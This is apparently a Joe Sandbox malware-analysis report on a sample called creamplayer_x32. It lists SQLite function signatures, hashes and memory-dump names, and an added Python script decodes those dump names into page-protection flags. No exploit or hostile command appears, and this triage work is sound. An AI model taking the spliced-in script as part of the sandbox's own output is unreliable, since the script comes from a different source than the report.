• Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
Similarity
• API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_aggregate_context
• String ID:
• API String ID: 4225432645-0
• Opcode ID: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
• Instruction ID: 24a20a1669ecabf1c8c9e0f75de4e20f6480f0c3e20d7f4799920e66bb4c3c2a
• Opcode Fuzzy Hash: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
• Instruction Fuzzy Hash: 3F21CF71B086588FDB009F29C48075E7BE7AFA4254F0484A8E894CF305EB34DC86CB91
APIs
• sqlite3_mutex_enter.SQLITE3(?,-00000200,?), ref: 6090359D
• sqlite3_mutex_leave.SQLITE3(?,-00000200,?), ref: 609035E0
• sqlite3_mutex_enter.SQLITE3(?,-00000200,?), ref: 609035F9
• sqlite3_mutex_leave.SQLITE3(?,-00000200,?), ref: 60903614
• sqlite3_free.SQLITE3(?,-00000200,?), ref: 6090361C
Memory Dump Source
• Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
Similarity
• API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
• String ID:
• API String ID: 251237202-0
• Opcode ID: d176fa110bd2286076a254f1a84b89a7a2b75649dc4a807f2bdee778eef171d4
• Instruction ID: 98a7ce7f1ce2ff6a0e5ca4ca87ec4bf20a5c319c62b2fc6798152503390b0136
• Opcode Fuzzy Hash: d176fa110bd2286076a254f1a84b89a7a2b75649dc4a807f2bdee778eef171d4
• Instruction Fuzzy Hash: B211FE725186218BCB00EF7DC8C16197FE7FB66358F01491DE866D7362D73AD480AB42
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
Similarity
• API ID: sqlite3_log
• String ID: ($string or blob too big$|
• API String ID: 632333372-2398534278
• Opcode ID: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
• Instruction ID: 3c3a64a58f66130c0c9aec06ea77be0954bd7b4098f3428da06b6372deec6608
• Opcode Fuzzy Hash: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
• Instruction Fuzzy Hash: 5DC10CB5A043288FCB66CF28C981789B7BABB59304F1085D9E958A7345C775EF81CF40
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_stricmp
                                                                                                    • String ID: BINARY
                                                                                                    • API String ID: 912767213-907554435
                                                                                                    • Opcode ID: dd54eeba7b99beb4c129e1ce0ebb3c97c4d31291de79a9977aa1c0a9ff3222ee
                                                                                                    • Instruction ID: 142a1e9d4f1e8552d2c1f4074703eb5ae9f1e70d76b7ded3e689f9c37387bea1
                                                                                                    • Opcode Fuzzy Hash: dd54eeba7b99beb4c129e1ce0ebb3c97c4d31291de79a9977aa1c0a9ff3222ee
                                                                                                    • Instruction Fuzzy Hash: 11512AB8A142159FCF05CF68D580A9EBBFBBFA9314F208569D855AB318D335EC41CB90
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Virtual$Protect$Query
                                                                                                    • String ID: @
                                                                                                    • API String ID: 3618607426-2766056989
                                                                                                    • Opcode ID: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                                                                    • Instruction ID: 11fd3fd6c91f2e29dbdaed7331fdf7a08ef8f1da01c53322037319a40d79a89e
                                                                                                    • Opcode Fuzzy Hash: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                                                                    • Instruction Fuzzy Hash: 003141B5E15208AFEB14DFA9D48158EFFF5EF99254F10852AE868E3310E371D940CB52
                                                                                                    APIs
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 60928353
                                                                                                      • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                                                    • sqlite3_realloc.SQLITE3 ref: 609283A0
                                                                                                    • sqlite3_free.SQLITE3 ref: 609283B6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
                                                                                                    • String ID: d
                                                                                                    • API String ID: 211589378-2564639436
                                                                                                    • Opcode ID: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                                                                    • Instruction ID: 0830c2115c9ea807631a831f7f1165b0ee40d8a8a94356aa67113494a68d5982
                                                                                                    • Opcode Fuzzy Hash: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                                                                    • Instruction Fuzzy Hash: 222137B0A04205CFDB14DF59D4C078ABBF6FF69314F158469D8889B309E3B8E841CBA1
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: _Jv_RegisterClasses$libgcj-11.dll
                                                                                                    • API String ID: 1646373207-2713375476
                                                                                                    • Opcode ID: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                                                    • Instruction ID: e6822cb61b404b68644b44a252d8259deade1a358cfa59fcc717d95409d4d83a
                                                                                                    • Opcode Fuzzy Hash: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                                                    • Instruction Fuzzy Hash: 0DE04F7062D30586FB443F794D923297AEB5F72549F00081CD9929B240EBB4D440D753
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2313487548-0
                                                                                                    • Opcode ID: 17c4197e66eccf8e4e539c70c01e6b2d08fb8491bcf73b2b2b780fd64eb57762
                                                                                                    • Instruction ID: 4e09bb13dd5a3c3c1d339de95b14bc5918580ae4e3dbdcf066e72e084d482625
                                                                                                    • Opcode Fuzzy Hash: 17c4197e66eccf8e4e539c70c01e6b2d08fb8491bcf73b2b2b780fd64eb57762
                                                                                                    • Instruction Fuzzy Hash: 15E14674928209EFDB04CF94D184B9EBBB2FF69304F208558D8956B259D774EC86CF81
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: sqlite_master$sqlite_sequence$sqlite_temp_master
                                                                                                    • API String ID: 0-1177837799
                                                                                                    • Opcode ID: b45b6970ebe54efa46efcb65f0e1138f7cff2b55d537d73117a3441f01693427
                                                                                                    • Instruction ID: e5240d50caebec33bd4ce83d4b9fb982fe545a794019e3d400788b6e3ec19482
                                                                                                    • Opcode Fuzzy Hash: b45b6970ebe54efa46efcb65f0e1138f7cff2b55d537d73117a3441f01693427
                                                                                                    • Instruction Fuzzy Hash: F7C13974B062089BDB05DF68D49179EBBF3AFA8308F14C42DE8899B345DB39D841CB41
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_mallocsqlite3_value_bytessqlite3_value_text
                                                                                                    • String ID:
                                                                                                    • API String ID: 1648232842-0
                                                                                                    • Opcode ID: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                                                                    • Instruction ID: a01add595a6c287de5924383f0ed77e5cc34082cd65fcd393cbe5beac3228527
                                                                                                    • Opcode Fuzzy Hash: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                                                                    • Instruction Fuzzy Hash: 4531C0B4A042058FDB04DF29C094B5ABBE2FF98354F1484A9EC498F349D779E846CBA0
                                                                                                    APIs
                                                                                                    • sqlite3_step.SQLITE3 ref: 609614AB
                                                                                                    • sqlite3_reset.SQLITE3 ref: 609614BF
                                                                                                      • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                                      • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                                    • sqlite3_column_int64.SQLITE3 ref: 609614D4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_column_int64sqlite3_mutex_entersqlite3_mutex_leavesqlite3_resetsqlite3_step
                                                                                                    • String ID:
                                                                                                    • API String ID: 3429445273-0
                                                                                                    • Opcode ID: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                                                                    • Instruction ID: 62863439de2fabb71fd3664abc4fbfc11ff04353a6e6e3e42574d1c19fb7889d
                                                                                                    • Opcode Fuzzy Hash: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                                                                    • Instruction Fuzzy Hash: AE316470A183408BEF15CF69C1C5749FBA6AFA7348F188599DC864F30AD375D884C752
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_snprintf$sqlite3_stricmpsqlite3_value_text
                                                                                                    • String ID:
                                                                                                    • API String ID: 1035992805-0
                                                                                                    • Opcode ID: 213593095aed0ecc64844f89ed1f3878beaaf7633e295caa013ed5846923251b
                                                                                                    • Instruction ID: 84d28b158f1a11e063f70be148de9c7b2eff514b3bcf7808f17aa895500be78a
                                                                                                    • Opcode Fuzzy Hash: 213593095aed0ecc64844f89ed1f3878beaaf7633e295caa013ed5846923251b
                                                                                                    • Instruction Fuzzy Hash: 8C3178B0A08324DFEB24CF28C481B4ABBF6FBA5318F04C499E4888B251C775D885DF42
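Every function entry above cites the same memory dump set for the module loaded at 60900000 (one "Source File" plus six "Associated" dumps). The following parser is an added example written for this page, not Joe Sandbox code and not part of the report. It reads those dump names and decodes the fields that can be checked against known Windows constants: the fourth dot-separated field equals the "Offset" base shown for each dump, the fifth field takes the values 0x02/0x04/0x08/0x20 that match the winnt.h PAGE_* protection constants, and the seventh field is 0x01000000, which matches MEM_IMAGE. Treating those fields as address, protection and region type is an assumption inferred from the values on this page, not documented Joe Sandbox semantics; the other fields are carried through unparsed. The sample lines are copied from the dump block above.

```python
"""Parse Joe Sandbox memory-dump source names as printed in this report.

Added example, not part of the report or of Joe Sandbox. Field meanings are
assumptions inferred from the values on this page (see the lead-in), except
for the PAGE_* and MEM_* constant values themselves, which are from winnt.h.
"""
import re
from dataclasses import dataclass

# Windows memory-protection constants (winnt.h); exact values.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE_MASK = 0x10 | 0x20 | 0x40 | 0x80
WRITABLE_MASK = 0x04 | 0x08 | 0x40 | 0x80

# MEMORY_BASIC_INFORMATION.Type constants (winnt.h); exact values.
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed layout: <pid>.<stage>.<dump id>.<address>.<protection>.<f6>.<type>.<f8>.sdmp
# Text fused onto the name by page extraction (e.g. "Download File") is ignored.
_NAME = re.compile(
    r"(?P<pid>[0-9A-F]{8})\.(?P<stage>[0-9A-F]{8})\.(?P<dump>\d+)\."
    r"(?P<addr>[0-9A-F]{16})\.(?P<prot>[0-9A-F]{8})\.(?P<f6>[0-9A-F]{8})\."
    r"(?P<type>[0-9A-F]{8})\.(?P<f8>[0-9A-F]{8})\.sdmp",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class DumpRegion:
    pid: int
    address: int
    protection: int
    mem_type: int
    name: str

    @property
    def executable(self) -> bool:
        return bool(self.protection & EXECUTABLE_MASK)

    @property
    def writable(self) -> bool:
        return bool(self.protection & WRITABLE_MASK)


def parse_dump_name(text: str) -> DumpRegion:
    """Extract the dump name from a report line and decode its fields."""
    m = _NAME.search(text)
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {text!r}")
    return DumpRegion(
        pid=int(m["pid"], 16),
        address=int(m["addr"], 16),
        protection=int(m["prot"], 16),
        mem_type=int(m["type"], 16),
        name=m.group(0),
    )


def describe(region: DumpRegion) -> str:
    prot = PAGE_PROTECTION.get(region.protection, f"0x{region.protection:X}")
    kind = MEM_TYPE.get(region.mem_type, f"0x{region.mem_type:X}")
    return f"pid {region.pid} {region.address:#010x} {prot} {kind}"


def regions_from_report(lines):
    """Unique regions from 'Source File:' / 'Associated:' lines, by address.

    The same dump set is repeated for every function entry in the report, so
    duplicates are collapsed on the dump name.
    """
    seen = {}
    for line in lines:
        if "Source File:" in line or "Associated:" in line:
            region = parse_dump_name(line)
            seen[region.name] = region
    return sorted(seen.values(), key=lambda r: r.address)


def rwx_regions(regions):
    """Regions both writable and executable: worth a look when a report
    flags changed PE section rights, since an image section normally is not."""
    return [r for r in regions if r.executable and r.writable]


# Copied from the dump block of this report (module at 0x60900000).
REPORT_LINES = [
    "• Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true",
    "• Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File",
    "• Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File",
    "• Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File",
    "• Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File",
    "• Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File",
    "• Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File",
]

if __name__ == "__main__":
    for r in regions_from_report(REPORT_LINES):
        print(describe(r), "EXEC" if r.executable else "")
```

Run on the lines above, it prints one row per region and marks only the 60901000 dump (PAGE_EXECUTE_READ) as executable; the list from `rwx_regions` is empty for this module, which is the expected state for an unmodified image and the baseline against which a "changes PE section rights" finding would be compared.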
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 609034D8
                                                                                                    • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903521
                                                                                                    • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 6090354A
                                                                                                    • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903563
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 1477753154-0
                                                                                                    • Opcode ID: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                                                                    • Instruction ID: 848dca46e936c6e01d33e08870ae11aa620bd8b24bdb606da7ea596206f2e213
                                                                                                    • Opcode Fuzzy Hash: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                                                                    • Instruction Fuzzy Hash: 44111F726186218FDB00EF7DC8817597FEAFB66308F00842DE865E7362E779D8819741
                                                                                                    APIs
                                                                                                    • sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                                                      • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                                                    • sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_enter$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 2673540737-0
                                                                                                    • Opcode ID: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                                                                    • Instruction ID: c4988029ba64cfb2248a7cf0c790324acf4c13eb0f9cd3f15fdedc175ef3c91a
                                                                                                    • Opcode Fuzzy Hash: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                                                                    • Instruction Fuzzy Hash: F9019276E143148BCB00EF79D88561ABFE7FBA5324F008528EC9497364E735DC408B81
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_text$sqlite3_freesqlite3_load_extension
                                                                                                    • String ID:
                                                                                                    • API String ID: 3526213481-0
